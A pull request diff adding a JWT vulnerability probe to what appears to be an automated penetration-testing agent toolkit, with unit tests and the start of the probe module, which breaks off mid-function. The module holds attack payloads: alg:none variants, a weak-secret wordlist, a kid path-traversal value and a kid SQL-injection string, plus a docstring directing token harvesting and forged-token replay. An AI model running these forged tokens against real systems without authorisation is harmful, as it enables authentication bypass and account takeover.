### PR TITLE
feat: JWT vulnerability probe for penetration tester (#66)

### DIFF
--- a/squad/penetration_tester/__init__.py
+++ b/squad/penetration_tester/__init__.py
@@ -35,6 +35,7 @@ from tools.pentest.cookies import check_cookies
 from tools.pentest.cors import check_cors_misconfiguration
 from tools.pentest.errors import check_error_disclosure
 from tools.pentest.hpp import check_hpp
+from tools.pentest.jwt import check_jwt
 from tools.pentest.ldap_injection import check_ldap_injection
 from tools.pentest.nosqli import run_nosqli
 from tools.pentest.nuclei import run_nuclei
@@ -706,6 +707,33 @@ def xxe_probe_tool(endpoints_json: str) -> list[dict]:
     return [f.model_dump() for f in check_xxe(_parse_endpoints(endpoints_json))]
 
 
+@tool("JWT Vulnerability Check")
+def jwt_check_tool(token: str, endpoint: str) -> list[dict]:
+    """
+    Test a JWT token for common vulnerabilities by replaying forged tokens
+    against the authenticated endpoint and detecting 4xx -> 2xx transitions.
+
+    token: the raw JWT string (three base64url parts separated by dots).
+      Source from: Authorization: Bearer headers in observed requests,
+      Set-Cookie headers with session/auth cookies, JS source or API responses
+      containing access_token or id_token fields, cookie values that begin with
+      eyJ (base64url-encoded JSON header).
+
+    endpoint: the URL that validates the JWT. Should return 401 or 403 without
+      a valid token and 200 on success. Use the endpoint where the token was
+      first observed in use (e.g. /api/profile, /api/me, /dashboard).
+
+    Attacks attempted: alg:none (4 variants), RS256->HS256 confusion via JWKS,
+    weak HMAC secret brute-force, kid path traversal, kid SQL injection, and
+    claims tampering without re-signing.
+
+    Run on every JWT discovered during recon, especially on admin and account
+    endpoints. All confirmed bypasses are CRITICAL.
+    Returns raw findings as dicts.
+    """
+    return [f.model_dump() for f in check_jwt(token, endpoint)]
+
+
 MEMBER = SquadMember(
     slug="penetration_tester",
     dir=Path(__file__).parent,
@@ -748,5 +776,6 @@ MEMBER = SquadMember(
         ldap_injection_tool,
         cmd_injection_tool,
         xxe_probe_tool,
+        jwt_check_tool,
     ],
 )

--- a/squad/penetration_tester/__init__.py
+++ b/squad/penetration_tester/__init__.py
@@ -724,8 +724,8 @@ def jwt_check_tool(token: str, endpoint: str) -> list[dict]:
       first observed in use (e.g. /api/profile, /api/me, /dashboard).
 
     Attacks attempted: alg:none (4 variants), RS256->HS256 confusion via JWKS,
-    weak HMAC secret brute-force, kid path traversal, kid SQL injection, and
-    claims tampering without re-signing.
+    weak HMAC secret brute-force, kid path traversal, kid SQL injection,
+    kid NoSQL injection (MongoDB operators), and claims tampering without re-signing.
 
     Run on every JWT discovered during recon, especially on admin and account
     endpoints. All confirmed bypasses are CRITICAL.

--- a/tests/test_jwt.py
+++ b/tests/test_jwt.py
@@ -14,6 +14,7 @@ import pytest
 from models import Severity
 from tools.pentest.jwt import (
     _ALG_NONE_VARIANTS,
+    _KID_NOSQLI_OPERATORS,
     _KID_PATH_TRAVERSAL,
     _KID_SQLI,
     _WEAK_SECRETS,
@@ -222,6 +223,29 @@ class TestKidInjection:
         sqli = [r for r in results if "SQL injection" in r.title]
         assert len(sqli) == 1
         assert sqli[0].severity_hint == Severity.CRITICAL
+
+    def test_detects_kid_nosql_injection(self) -> None:
+        token = _make_token({"alg": "HS256", "typ": "JWT", "kid": "key-1"}, {"sub": "1"})
+
+        def fake_get(url: str, **kw: Any) -> MagicMock:
+            auth = str(kw.get("headers", {}).get("Authorization", ""))
+            t = auth.removeprefix("Bearer ") if "Bearer " in auth else ""
+            h = _decode_token_part(t, 0) if t else {}
+            if isinstance(h.get("kid"), dict):
+                return _mock_response(200)
+            return _mock_response(401)
+
+        with patch("requests.get", side_effect=fake_get):
+            results = check_jwt(token, _ENDPOINT)
+
+        nosqli = [r for r in results if "NoSQL" in r.title]
+        assert len(nosqli) == 1
+        assert nosqli[0].severity_hint == Severity.CRITICAL
+
+    def test_nosql_operators_cover_gt_and_ne(self) -> None:
+        operators = [list(op.keys())[0] for op in _KID_NOSQLI_OPERATORS]
+        assert "$gt" in operators
+        assert "$ne" in operators
 
     def test_kid_attacks_skipped_when_no_kid(self) -> None:
         token = _make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "1"})

--- a/tests/test_jwt.py
+++ b/tests/test_jwt.py
@@ -17,12 +17,12 @@ from tools.pentest.jwt import (
     _KID_PATH_TRAVERSAL,
     _KID_SQLI,
     _WEAK_SECRETS,
-    _b64url_decode,
-    _b64url_encode,
-    _decode_part,
-    _forge_hs,
-    _forge_unsigned,
-    _verify_hs,
+    _base64url_decode,
+    _base64url_encode,
+    _decode_token_part,
+    _forge_hmac_token,
+    _forge_unsigned_token,
+    _verify_hmac_signature,
     check_jwt,
 )
 
@@ -31,24 +31,24 @@ pytestmark = pytest.mark.unit
 _ENDPOINT = "https://app.example.com/api/profile"
 
 
-def _b64(d: dict) -> str:
+def _dict_to_base64url(d: dict) -> str:
     raw = json.dumps(d, separators=(",", ":")).encode()
     return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
 
 
 def _make_token(header: dict, payload: dict, sig: str = "fakesig") -> str:
-    return f"{_b64(header)}.{_b64(payload)}.{sig}"
+    return f"{_dict_to_base64url(header)}.{_dict_to_base64url(payload)}.{sig}"
 
 
-def _make_hs256_token(header: dict, payload: dict, secret: bytes) -> str:
-    h = _b64(header)
-    p = _b64(payload)
+def _make_hmac_signed_token(header: dict, payload: dict, secret: bytes) -> str:
+    h = _dict_to_base64url(header)
+    p = _dict_to_base64url(payload)
     sig_bytes = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
     s = base64.urlsafe_b64encode(sig_bytes).rstrip(b"=").decode()
     return f"{h}.{p}.{s}"
 
 
-def _resp(status: int = 200) -> MagicMock:
+def _mock_response(status: int = 200) -> MagicMock:
     r = MagicMock()
     r.status_code = status
     r.text = "{}"
@@ -57,48 +57,48 @@ def _resp(status: int = 200) -> MagicMock:
 
 
 class TestHelpers:
-    def test_b64url_roundtrip(self) -> None:
+    def test_base64url_roundtrip(self) -> None:
         original = b"\x00\xff\xfe hello world"
-        assert _b64url_decode(_b64url_encode(original)) == original
+        assert _base64url_decode(_base64url_encode(original)) == original
 
-    def test_decode_part_header(self) -> None:
+    def test_decode_token_part_header(self) -> None:
         header = {"alg": "HS256", "typ": "JWT"}
         token = _make_token(header, {"sub": "1"})
-        assert _decode_part(token, 0) == header
+        assert _decode_token_part(token, 0) == header
 
-    def test_decode_part_payload(self) -> None:
+    def test_decode_token_part_payload(self) -> None:
         payload = {"sub": "42", "role": "user"}
         token = _make_token({"alg": "HS256"}, payload)
-        assert _decode_part(token, 1) == payload
+        assert _decode_token_part(token, 1) == payload
 
-    def test_forge_unsigned_has_empty_sig(self) -> None:
-        forged = _forge_unsigned({"alg": "none"}, {"sub": "1"})
+    def test_forge_unsigned_token_has_empty_sig(self) -> None:
+        forged = _forge_unsigned_token({"alg": "none"}, {"sub": "1"})
         assert forged.endswith(".")
         assert forged.count(".") == 2
 
-    def test_verify_hs_correct_secret(self) -> None:
+    def test_verify_hmac_signature_correct_secret(self) -> None:
         header = {"alg": "HS256", "typ": "JWT"}
         payload = {"sub": "1"}
-        token = _make_hs256_token(header, payload, b"secret")
-        assert _verify_hs(token, b"secret", "HS256") is True
+        token = _make_hmac_signed_token(header, payload, b"secret")
+        assert _verify_hmac_signature(token, b"secret", "HS256") is True
 
-    def test_verify_hs_wrong_secret(self) -> None:
+    def test_verify_hmac_signature_wrong_secret(self) -> None:
         header = {"alg": "HS256", "typ": "JWT"}
         payload = {"sub": "1"}
-        token = _make_hs256_token(header, payload, b"secret")
-        assert _verify_hs(token, b"wrong", "HS256") is False
+        token = _make_hmac_signed_token(header, payload, b"secret")
+        assert _verify_hmac_signature(token, b"wrong", "HS256") is False
 
-    def test_forge_hs_verifies(self) -> None:
+    def test_forge_hmac_token_verifies(self) -> None:
         header = {"alg": "HS256", "typ": "JWT"}
         payload = {"sub": "1"}
-        forged = _forge_hs("HS256", header, payload, b"secret")
-        assert _verify_hs(forged, b"secret", "HS256") is True
+        forged = _forge_hmac_token("HS256", header, payload, b"secret")
+        assert _verify_hmac_signature(forged, b"secret", "HS256") is True
 
 
 class TestAlgNone:
     def test_detects_alg_none_bypass(self) -> None:
         token = _make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "1", "role": "user"})
-        with patch("requests.get", return_value=_resp(200)):
+        with patch("requests.get", return_value=_mock_response(200)):
             results = check_jwt(token, _ENDPOINT)
         alg_none = [r for r in results if "alg:none" in r.title]
         assert len(alg_none) == 1
@@ -106,7 +106,7 @@ class TestAlgNone:
 
     def test_no_finding_when_none_rejected(self) -> None:
         token = _make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "1"})
-        with patch("requests.get", return_value=_resp(401)):
+        with patch("requests.get", return_value=_mock_response(401)):
             results = check_jwt(token, _ENDPOINT)
         assert not any("alg:none" in r.title for r in results)
 
@@ -114,7 +114,7 @@ class TestAlgNone:
         # Only one alg:none finding should be reported even though 4 variants exist.
         token = _make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "1"})
 
-        with patch("requests.get", return_value=_resp(200)):
+        with patch("requests.get", return_value=_mock_response(200)):
             results = check_jwt(token, _ENDPOINT)
 
         alg_none = [r for r in results if "alg:none" in r.title]
@@ -132,9 +132,9 @@ class TestWeakSecret:
     def test_detects_weak_secret(self) -> None:
         header = {"alg": "HS256", "typ": "JWT"}
         payload = {"sub": "1", "role": "user"}
-        token = _make_hs256_token(header, payload, b"secret")
+        token = _make_hmac_signed_token(header, payload, b"secret")
 
-        with patch("requests.get", return_value=_resp(401)):
+        with patch("requests.get", return_value=_mock_response(401)):
             results = check_jwt(token, _ENDPOINT)
 
         weak = [r for r in results if "weak HMAC" in r.title]
@@ -145,9 +145,9 @@ class TestWeakSecret:
     def test_no_finding_on_strong_secret(self) -> None:
         header = {"alg": "HS256", "typ": "JWT"}
         payload = {"sub": "1"}
-        token = _make_hs256_token(header, payload, b"v3ryStr0ngS3cr3t!XYZ987")
+        token = _make_hmac_signed_token(header, payload, b"v3ryStr0ngS3cr3t!XYZ987")
 
-        with patch("requests.get", return_value=_resp(401)):
+        with patch("requests.get", return_value=_mock_response(401)):
             results = check_jwt(token, _ENDPOINT)
 
         assert not any("weak HMAC" in r.title for r in results)
@@ -156,9 +156,9 @@ class TestWeakSecret:
         # Cracking the secret offline is proof enough - even if replay returns 403.
         header = {"alg": "HS256", "typ": "JWT"}
         payload = {"sub": "1"}
-        token = _make_hs256_token(header, payload, b"secret")
+        token = _make_hmac_signed_token(header, payload, b"secret")
 
-        with patch("requests.get", return_value=_resp(403)):
+        with patch("requests.get", return_value=_mock_response(403)):
             results = check_jwt(token, _ENDPOINT)
 
         weak = [r for r in results if "weak HMAC" in r.title]
@@ -173,7 +173,7 @@ class TestWeakSecret:
         token = _make_token({"alg": "RS256", "typ": "JWT"}, {"sub": "1"})
 
         def fake_get(url: str, **kw: Any) -> MagicMock:
-            r = _resp(404)
+            r = _mock_response(404)
             r.json.return_value = {}
             r.text = "{}"
             return r
@@ -192,10 +192,10 @@ class TestKidInjection:
             # Only the path-traversal probe is accepted.
             auth = str(kw.get("headers", {}).get("Authorization", ""))
             t = auth.removeprefix("Bearer ") if "Bearer " in auth else ""
-            h = _decode_part(t, 0) if t else {}
+            h = _decode_token_part(t, 0) if t else {}
             if h.get("kid") == _KID_PATH_TRAVERSAL:
-                return _resp(200)
-            return _resp(401)
+                return _mock_response(200)
+            return _mock_response(401)
 
         with patch("requests.get", side_effect=fake_get):
             results = check_jwt(token, _ENDPOINT)
@@ -211,10 +211,10 @@ class TestKidInjection:
         def fake_get(url: str, **kw: Any) -> MagicMock:
             auth = str(kw.get("headers", {}).get("Authorization", ""))
             t = auth.removeprefix("Bearer ") if "Bearer " in auth else ""
-            h = _decode_part(t, 0) if t else {}
+            h = _decode_token_part(t, 0) if t else {}
             if h.get("kid") == _KID_SQLI:
-                return _resp(200)
-            return _resp(401)
+                return _mock_response(200)
+            return _mock_response(401)
 
         with patch("requests.get", side_effect=fake_get):
             results = check_jwt(token, _ENDPOINT)
@@ -225,7 +225,7 @@ class TestKidInjection:
 
     def test_kid_attacks_skipped_when_no_kid(self) -> None:
         token = _make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "1"})
-        with patch("requests.get", return_value=_resp(401)):
+        with patch("requests.get", return_value=_mock_response(401)):
             results = check_jwt(token, _ENDPOINT)
         kid_findings = [r for r in results if "kid" in r.title]
         assert kid_findings == []
@@ -241,12 +241,12 @@ class TestClaimsTampering:
             if "Bearer " in auth:
                 t = auth.removeprefix("Bearer ")
                 try:
-                    pl = _decode_part(t, 1)
+                    pl = _decode_token_part(t, 1)
                     if pl.get("role") == "admin":
-                        return _resp(200)
+                        return _mock_response(200)
                 except Exception:
                     pass
-            return _resp(401)
+            return _mock_response(401)
 
         with patch("requests.get", side_effect=fake_get):
             results = check_jwt(token, _ENDPOINT)
@@ -258,7 +258,7 @@ class TestClaimsTampering:
 
     def test_no_tamper_finding_when_signature_checked(self) -> None:
         token = _make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "1", "role": "user"})
-        with patch("requests.get", return_value=_resp(401)):
+        with patch("requests.get", return_value=_mock_response(401)):
             results = check_jwt(token, _ENDPOINT)
         tamper = [r for r in results if "signature not verified" in r.title]
         assert tamper == []
@@ -269,7 +269,7 @@ class TestRS256Confusion:
         token = _make_token({"alg": "RS256", "typ": "JWT", "kid": "k1"}, {"sub": "1"})
 
         # Minimal self-signed RSA public key as a JWK (tiny key, test only).
-        # We use a real small RSA key so _jwk_to_pem succeeds.
+        # We use a real small RSA key so _convert_jwk_to_pem succeeds.
         from cryptography.hazmat.backends import default_backend
         from cryptography.hazmat.primitives.asymmetric import rsa
         from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat
@@ -280,7 +280,7 @@ class TestRS256Confusion:
         pub = private_key.public_key()
         pub_numbers = pub.public_numbers()
 
-        def _int_to_b64(n: int) -> str:
+        def _int_to_base64url(n: int) -> str:
             length = (n.bit_length() + 7) // 8
             return base64.urlsafe_b64encode(n.to_bytes(length, "big")).rstrip(b"=").decode()
 
@@ -289,8 +289,8 @@ class TestRS256Confusion:
                 {
                     "kty": "RSA",
                     "kid": "k1",
-                    "n": _int_to_b64(pub_numbers.n),
-                    "e": _int_to_b64(pub_numbers.e),
+                    "n": _int_to_base64url(pub_numbers.n),
+                    "e": _int_to_base64url(pub_numbers.e),
                 }
             ]
         }
@@ -298,7 +298,7 @@ class TestRS256Confusion:
 
         def fake_get(url: str, **kw: Any) -> MagicMock:
             if "jwks" in url:
-                r = _resp(200)
+                r = _mock_response(200)
                 r.json.return_value = jwks_payload
                 r.text = json.dumps(jwks_payload)
                 return r
@@ -307,12 +307,12 @@ class TestRS256Confusion:
             if "Bearer " in auth:
                 t = auth.removeprefix("Bearer ")
                 try:
-                    h_alg = _decode_part(t, 0).get("alg") == "HS256"
-                    if h_alg and _verify_hs(t, pem_secret, "HS256"):
-                        return _resp(200)
+                    header_alg_is_hs256 = _decode_token_part(t, 0).get("alg") == "HS256"
+                    if header_alg_is_hs256 and _verify_hmac_signature(t, pem_secret, "HS256"):
+                        return _mock_response(200)
                 except Exception:
                     pass
-            return _resp(401)
+            return _mock_response(401)
 
         with patch("requests.get", side_effect=fake_get):
             results = check_jwt(token, _ENDPOINT)
@@ -323,14 +323,14 @@ class TestRS256Confusion:
 
     def test_rs256_skipped_when_no_jwks(self) -> None:
         token = _make_token({"alg": "RS256", "typ": "JWT"}, {"sub": "1"})
-        with patch("requests.get", return_value=_resp(404)):
+        with patch("requests.get", return_value=_mock_response(404)):
             results = check_jwt(token, _ENDPOINT)
         assert not any("RS256->HS256" in r.title for r in results)
 
 
 class TestEdgeCases:
     def test_invalid_token_returns_empty(self) -> None:
-        with patch("requests.get", return_value=_resp(200)):
+        with patch("requests.get", return_value=_mock_response(200)):
             results = check_jwt("not.a.jwt", _ENDPOINT)
         assert results == []
 
@@ -341,6 +341,6 @@ class TestEdgeCases:
         assert isinstance(results, list)
 
     def test_two_part_token_returns_empty(self) -> None:
-        with patch("requests.get", return_value=_resp(200)):
+        with patch("requests.get", return_value=_mock_response(200)):
             results = check_jwt("onlytwoparts.here", _ENDPOINT)
         assert results == []

--- a/tests/test_jwt.py
+++ b/tests/test_jwt.py
@@ -1,0 +1,346 @@
+"""tests/test_jwt.py - unit tests for tools/pentest/jwt.py"""
+
+from __future__ import annotations
+
+import base64
+import hashlib
+import hmac
+import json
+from typing import Any
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from models import Severity
+from tools.pentest.jwt import (
+    _ALG_NONE_VARIANTS,
+    _KID_PATH_TRAVERSAL,
+    _KID_SQLI,
+    _WEAK_SECRETS,
+    _b64url_decode,
+    _b64url_encode,
+    _decode_part,
+    _forge_hs,
+    _forge_unsigned,
+    _verify_hs,
+    check_jwt,
+)
+
+pytestmark = pytest.mark.unit
+
+_ENDPOINT = "https://app.example.com/api/profile"
+
+
+def _b64(d: dict) -> str:
+    raw = json.dumps(d, separators=(",", ":")).encode()
+    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
+
+
+def _make_token(header: dict, payload: dict, sig: str = "fakesig") -> str:
+    return f"{_b64(header)}.{_b64(payload)}.{sig}"
+
+
+def _make_hs256_token(header: dict, payload: dict, secret: bytes) -> str:
+    h = _b64(header)
+    p = _b64(payload)
+    sig_bytes = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
+    s = base64.urlsafe_b64encode(sig_bytes).rstrip(b"=").decode()
+    return f"{h}.{p}.{s}"
+
+
+def _resp(status: int = 200) -> MagicMock:
+    r = MagicMock()
+    r.status_code = status
+    r.text = "{}"
+    r.json.return_value = {}
+    return r
+
+
+class TestHelpers:
+    def test_b64url_roundtrip(self) -> None:
+        original = b"\x00\xff\xfe hello world"
+        assert _b64url_decode(_b64url_encode(original)) == original
+
+    def test_decode_part_header(self) -> None:
+        header = {"alg": "HS256", "typ": "JWT"}
+        token = _make_token(header, {"sub": "1"})
+        assert _decode_part(token, 0) == header
+
+    def test_decode_part_payload(self) -> None:
+        payload = {"sub": "42", "role": "user"}
+        token = _make_token({"alg": "HS256"}, payload)
+        assert _decode_part(token, 1) == payload
+
+    def test_forge_unsigned_has_empty_sig(self) -> None:
+        forged = _forge_unsigned({"alg": "none"}, {"sub": "1"})
+        assert forged.endswith(".")
+        assert forged.count(".") == 2
+
+    def test_verify_hs_correct_secret(self) -> None:
+        header = {"alg": "HS256", "typ": "JWT"}
+        payload = {"sub": "1"}
+        token = _make_hs256_token(header, payload, b"secret")
+        assert _verify_hs(token, b"secret", "HS256") is True
+
+    def test_verify_hs_wrong_secret(self) -> None:
+        header = {"alg": "HS256", "typ": "JWT"}
+        payload = {"sub": "1"}
+        token = _make_hs256_token(header, payload, b"secret")
+        assert _verify_hs(token, b"wrong", "HS256") is False
+
+    def test_forge_hs_verifies(self) -> None:
+        header = {"alg": "HS256", "typ": "JWT"}
+        payload = {"sub": "1"}
+        forged = _forge_hs("HS256", header, payload, b"secret")
+        assert _verify_hs(forged, b"secret", "HS256") is True
+
+
+class TestAlgNone:
+    def test_detects_alg_none_bypass(self) -> None:
+        token = _make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "1", "role": "user"})
+        with patch("requests.get", return_value=_resp(200)):
+            results = check_jwt(token, _ENDPOINT)
+        alg_none = [r for r in results if "alg:none" in r.title]
+        assert len(alg_none) == 1
+        assert alg_none[0].severity_hint == Severity.CRITICAL
+
+    def test_no_finding_when_none_rejected(self) -> None:
+        token = _make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "1"})
+        with patch("requests.get", return_value=_resp(401)):
+            results = check_jwt(token, _ENDPOINT)
+        assert not any("alg:none" in r.title for r in results)
+
+    def test_stops_after_first_accepted_variant(self) -> None:
+        # Only one alg:none finding should be reported even though 4 variants exist.
+        token = _make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "1"})
+
+        with patch("requests.get", return_value=_resp(200)):
+            results = check_jwt(token, _ENDPOINT)
+
+        alg_none = [r for r in results if "alg:none" in r.title]
+        assert len(alg_none) == 1
+        # The first variant tried should appear in the evidence.
+        assert _ALG_NONE_VARIANTS[0] in alg_none[0].evidence
+
+    def test_all_four_none_variants_defined(self) -> None:
+        variants_lower = [v.lower() for v in _ALG_NONE_VARIANTS]
+        assert variants_lower.count("none") == len(_ALG_NONE_VARIANTS)
+        assert len(set(_ALG_NONE_VARIANTS)) == len(_ALG_NONE_VARIANTS)
+
+
+class TestWeakSecret:
+    def test_detects_weak_secret(self) -> None:
+        header = {"alg": "HS256", "typ": "JWT"}
+        payload = {"sub": "1", "role": "user"}
+        token = _make_hs256_token(header, payload, b"secret")
+
+        with patch("requests.get", return_value=_resp(401)):
+            results = check_jwt(token, _ENDPOINT)
+
+        weak = [r for r in results if "weak HMAC" in r.title]
+        assert len(weak) == 1
+        assert weak[0].severity_hint == Severity.CRITICAL
+        assert "secret" in weak[0].evidence
+
+    def test_no_finding_on_strong_secret(self) -> None:
+        header = {"alg": "HS256", "typ": "JWT"}
+        payload = {"sub": "1"}
+        token = _make_hs256_token(header, payload, b"v3ryStr0ngS3cr3t!XYZ987")
+
+        with patch("requests.get", return_value=_resp(401)):
+            results = check_jwt(token, _ENDPOINT)
+
+        assert not any("weak HMAC" in r.title for r in results)
+
+    def test_weak_secret_reported_even_without_2xx_replay(self) -> None:
+        # Cracking the secret offline is proof enough - even if replay returns 403.
+        header = {"alg": "HS256", "typ": "JWT"}
+        payload = {"sub": "1"}
+        token = _make_hs256_token(header, payload, b"secret")
+
+        with patch("requests.get", return_value=_resp(403)):
+            results = check_jwt(token, _ENDPOINT)
+
+        weak = [r for r in results if "weak HMAC" in r.title]
+        assert len(weak) == 1
+
+    def test_wordlist_includes_common_secrets(self) -> None:
+        assert "secret" in _WEAK_SECRETS
+        assert "password" in _WEAK_SECRETS
+        assert "" in _WEAK_SECRETS
+
+    def test_non_hs_alg_skips_brute_force(self) -> None:
+        token = _make_token({"alg": "RS256", "typ": "JWT"}, {"sub": "1"})
+
+        def fake_get(url: str, **kw: Any) -> MagicMock:
+            r = _resp(404)
+            r.json.return_value = {}
+            r.text = "{}"
+            return r
+
+        with patch("requests.get", side_effect=fake_get):
+            results = check_jwt(token, _ENDPOINT)
+
+        assert not any("weak HMAC" in r.title for r in results)
+
+
+class TestKidInjection:
+    def test_detects_kid_path_traversal(self) -> None:
+        token = _make_token({"alg": "HS256", "typ": "JWT", "kid": "key-1"}, {"sub": "1"})
+
+        def fake_get(url: str, **kw: Any) -> MagicMock:
+            # Only the path-traversal probe is accepted.
+            auth = str(kw.get("headers", {}).get("Authorization", ""))
+            t = auth.removeprefix("Bearer ") if "Bearer " in auth else ""
+            h = _decode_part(t, 0) if t else {}
+            if h.get("kid") == _KID_PATH_TRAVERSAL:
+                return _resp(200)
+            return _resp(401)
+
+        with patch("requests.get", side_effect=fake_get):
+            results = check_jwt(token, _ENDPOINT)
+
+        trav = [r for r in results if "path traversal" in r.title]
+        assert len(trav) == 1
+        assert trav[0].severity_hint == Severity.CRITICAL
+        assert _KID_PATH_TRAVERSAL in trav[0].evidence
+
+    def test_detects_kid_sql_injection(self) -> None:
+        token = _make_token({"alg": "HS256", "typ": "JWT", "kid": "key-1"}, {"sub": "1"})
+
+        def fake_get(url: str, **kw: Any) -> MagicMock:
+            auth = str(kw.get("headers", {}).get("Authorization", ""))
+            t = auth.removeprefix("Bearer ") if "Bearer " in auth else ""
+            h = _decode_part(t, 0) if t else {}
+            if h.get("kid") == _KID_SQLI:
+                return _resp(200)
+            return _resp(401)
+
+        with patch("requests.get", side_effect=fake_get):
+            results = check_jwt(token, _ENDPOINT)
+
+        sqli = [r for r in results if "SQL injection" in r.title]
+        assert len(sqli) == 1
+        assert sqli[0].severity_hint == Severity.CRITICAL
+
+    def test_kid_attacks_skipped_when_no_kid(self) -> None:
+        token = _make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "1"})
+        with patch("requests.get", return_value=_resp(401)):
+            results = check_jwt(token, _ENDPOINT)
+        kid_findings = [r for r in results if "kid" in r.title]
+        assert kid_findings == []
+
+
+class TestClaimsTampering:
+    def test_detects_missing_signature_verification(self) -> None:
+        token = _make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "1", "role": "user"})
+
+        def fake_get(url: str, **kw: Any) -> MagicMock:
+            # Accept any token with modified payload regardless of signature.
+            auth = str(kw.get("headers", {}).get("Authorization", ""))
+            if "Bearer " in auth:
+                t = auth.removeprefix("Bearer ")
+                try:
+                    pl = _decode_part(t, 1)
+                    if pl.get("role") == "admin":
+                        return _resp(200)
+                except Exception:
+                    pass
+            return _resp(401)
+
+        with patch("requests.get", side_effect=fake_get):
+            results = check_jwt(token, _ENDPOINT)
+
+        tamper = [r for r in results if "signature not verified" in r.title]
+        assert len(tamper) == 1
+        assert tamper[0].severity_hint == Severity.CRITICAL
+        assert "Original signature retained" in tamper[0].evidence
+
+    def test_no_tamper_finding_when_signature_checked(self) -> None:
+        token = _make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "1", "role": "user"})
+        with patch("requests.get", return_value=_resp(401)):
+            results = check_jwt(token, _ENDPOINT)
+        tamper = [r for r in results if "signature not verified" in r.title]
+        assert tamper == []
+
+
+class TestRS256Confusion:
+    def test_detects_rs256_hs256_confusion(self) -> None:
+        token = _make_token({"alg": "RS256", "typ": "JWT", "kid": "k1"}, {"sub": "1"})
+
+        # Minimal self-signed RSA public key as a JWK (tiny key, test only).
+        # We use a real small RSA key so _jwk_to_pem succeeds.
+        from cryptography.hazmat.backends import default_backend
+        from cryptography.hazmat.primitives.asymmetric import rsa
+        from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat
+
+        private_key = rsa.generate_private_key(
+            public_exponent=65537, key_size=2048, backend=default_backend()
+        )
+        pub = private_key.public_key()
+        pub_numbers = pub.public_numbers()
+
+        def _int_to_b64(n: int) -> str:
+            length = (n.bit_length() + 7) // 8
+            return base64.urlsafe_b64encode(n.to_bytes(length, "big")).rstrip(b"=").decode()
+
+        jwks_payload = {
+            "keys": [
+                {
+                    "kty": "RSA",
+                    "kid": "k1",
+                    "n": _int_to_b64(pub_numbers.n),
+                    "e": _int_to_b64(pub_numbers.e),
+                }
+            ]
+        }
+        pem_secret = pub.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo)
+
+        def fake_get(url: str, **kw: Any) -> MagicMock:
+            if "jwks" in url:
+                r = _resp(200)
+                r.json.return_value = jwks_payload
+                r.text = json.dumps(jwks_payload)
+                return r
+            # Accept the HS256-signed token (simulates the confused server).
+            auth = str(kw.get("headers", {}).get("Authorization", ""))
+            if "Bearer " in auth:
+                t = auth.removeprefix("Bearer ")
+                try:
+                    h_alg = _decode_part(t, 0).get("alg") == "HS256"
+                    if h_alg and _verify_hs(t, pem_secret, "HS256"):
+                        return _resp(200)
+                except Exception:
+                    pass
+            return _resp(401)
+
+        with patch("requests.get", side_effect=fake_get):
+            results = check_jwt(token, _ENDPOINT)
+
+        confusion = [r for r in results if "RS256->HS256" in r.title]
+        assert len(confusion) == 1
+        assert confusion[0].severity_hint == Severity.CRITICAL
+
+    def test_rs256_skipped_when_no_jwks(self) -> None:
+        token = _make_token({"alg": "RS256", "typ": "JWT"}, {"sub": "1"})
+        with patch("requests.get", return_value=_resp(404)):
+            results = check_jwt(token, _ENDPOINT)
+        assert not any("RS256->HS256" in r.title for r in results)
+
+
+class TestEdgeCases:
+    def test_invalid_token_returns_empty(self) -> None:
+        with patch("requests.get", return_value=_resp(200)):
+            results = check_jwt("not.a.jwt", _ENDPOINT)
+        assert results == []
+
+    def test_network_exception_swallowed(self) -> None:
+        token = _make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "1"})
+        with patch("requests.get", side_effect=OSError("connection refused")):
+            results = check_jwt(token, _ENDPOINT)
+        assert isinstance(results, list)
+
+    def test_two_part_token_returns_empty(self) -> None:
+        with patch("requests.get", return_value=_resp(200)):
+            results = check_jwt("onlytwoparts.here", _ENDPOINT)
+        assert results == []

--- a/tools/pentest/jwt.py
+++ b/tools/pentest/jwt.py
@@ -1,0 +1,342 @@
+"""JWT vulnerability detection - forge and replay modified tokens to detect
+algorithm confusion, weak secrets, kid injection, and disabled signature checks."""
+
+from __future__ import annotations
+
+import base64
+import hashlib
+import hmac as _hmac
+import json
+import logging
+import time
+from typing import Any
+from urllib.parse import urlparse
+
+from config import config
+from models import RawFinding, Severity
+from tools import http
+
+logger = logging.getLogger(__name__)
+
+_ALG_NONE_VARIANTS: list[str] = ["none", "None", "NONE", "nOnE"]
+
+_WEAK_SECRETS: list[str] = [
+    "",
+    "secret",
+    "Secret",
+    "password",
+    "jwt",
+    "jwt_secret",
+    "hs256",
+    "changeit",
+    "1234567890",
+    "qwerty",
+    "your-256-bit-secret",
+    "your-secret",
+]
+
+_JWKS_PATHS: list[str] = [
+    "/.well-known/jwks.json",
+    "/jwks.json",
+    "/jwks",
+    "/api/jwks",
+    "/oauth/jwks",
+]
+
+# kid injection payloads
+_KID_PATH_TRAVERSAL = "../../dev/null"
+_KID_SQLI = "' UNION SELECT 'cybersquad_jwt_kid_sqli' -- "
+_KID_SQLI_SECRET = "cybersquad_jwt_kid_sqli"  # nosec B105  # noqa: S105
+
+_HASH_FNS = {
+    "HS256": hashlib.sha256,
+    "HS384": hashlib.sha384,
+    "HS512": hashlib.sha512,
+}
+
+
+def _b64url_decode(s: str) -> bytes:
+    s += "=" * (4 - len(s) % 4)
+    return base64.urlsafe_b64decode(s)
+
+
+def _b64url_encode(b: bytes) -> str:
+    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()
+
+
+def _decode_part(token: str, idx: int) -> dict[str, Any]:
